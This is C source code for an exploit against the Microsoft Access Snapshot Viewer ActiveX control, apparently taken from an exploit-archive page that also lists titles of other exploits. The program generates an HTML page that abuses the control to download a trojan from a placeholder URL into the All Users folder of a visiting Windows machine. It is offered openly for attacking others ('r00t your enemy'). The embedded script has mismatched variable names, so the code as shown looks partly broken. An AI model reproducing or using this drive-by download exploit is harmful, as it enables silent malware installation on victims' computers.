/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0
Download nice binaries into an arbitrary box
Vulnerability discovered by Oliver Lavery
http://www.securityfocus.com/bid/8536/info
Remote: Yes
greetz to str0ke */ #include <stdio.h>
#include <stdlib.h>
#define Filename "Ms-Access-SnapShot.html"
FILE *File;
char data[] = "<html>n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attaque'></object>n"
"<script language='javascript'>nvar arbitrary_file = 'http://path_to_trojan'n"
"var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'nattack.SnapshotPath = arbitrary_filen"
"attack.CompressedPath = destinationnattack.PrintSnapshot(arbitrary_file,destination)n"
"<script>n<html>"; int main ()
{
printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**n");
printf("**c0ded by callAX**n");
printf("**r00t your enemy .| **"); FILE *File;
char *b0fer; if ( (File = fopen(Filename,"w b")) == NULL ) {
printf("n fopen() error");
exit(1);
} b0fer = (char*)malloc(strlen(data));
memcpy(b0fer,data,sizeof(data)-1);
fwrite(b0fer, strlen(data), 1,File);
fclose(File); printf("nn" Filename " has been created.n");
return 0;
}
【Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit】相关文章:
★ FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit
★ Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
★ FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
★ Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit
★ NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
★ Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)
★ Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
★ ESET Smart Security 3.0.667.0 Privilege Escalation PoC
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
★ LoveCMS 1.6.2 Final Update Settings Remote Exploit